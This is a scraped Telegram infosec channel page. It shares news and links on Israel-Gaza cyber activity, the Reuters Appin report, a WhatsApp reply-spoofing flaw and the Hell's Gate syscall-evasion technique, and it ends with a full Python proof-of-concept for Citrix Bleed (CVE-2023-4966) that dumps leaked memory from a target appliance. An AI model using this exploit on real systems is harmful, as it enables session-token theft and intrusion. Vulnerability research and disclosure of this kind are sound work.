cKure Red
2.39K subscribers
70 photos
34 videos
21 files
449 links
The director's cut on critical feeds from InfoSec world 🌎

Main Channel: @cKure

☕️ or queries email us
📨 i@ckure.org
Download Telegram
ISRAEL GAZA CONFLICT THE CYBER PERSPECTIVE.pdf
1.8 MB
Documentation of cyber activity amid the Israel Palestine war.
Shadowy hacking group targeting Israel shows outsized capabilities. Islarel Palestine conflict.

A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.

https://cyberscoop.com/hacking-israel-wild-card/
Indian government asks Reuters news agency 📰 to take down an article titled "How an Indian startup hacked the world 🌍"

Reuters had published the article and removed it after the Indian court order.

Reuters released the details about this: https://www.reuters.com/investigates/special-report/usa-hackers-appin/

It is likely that the article mentioned criminal activity by the startup that involved people in power and access.
cKure Red pinned «How an Indian startup (Appin) hacked the world 🌍 https://web.archive.org/web/20231117025741/https://www.reuters.com/investigates/special-report/usa-hackers-appin/»
Whatsapp Spoofing impersonate of reply message

All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.

https://github.com/lichti/whats-spoofing

PoC: https://youtu.be/_WL6hpAvNh8
Exploring Hell's Gate.

Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs.


https://redops.at/en/blog/exploring-hells-gate
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g.
192.168.1.200)')
args = parser.parse_args()

if
args.target is None:
print('Target must be provided (e.g. --target
192.168.1.200)')
sys.exit(0)

hostname =
args.target

if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")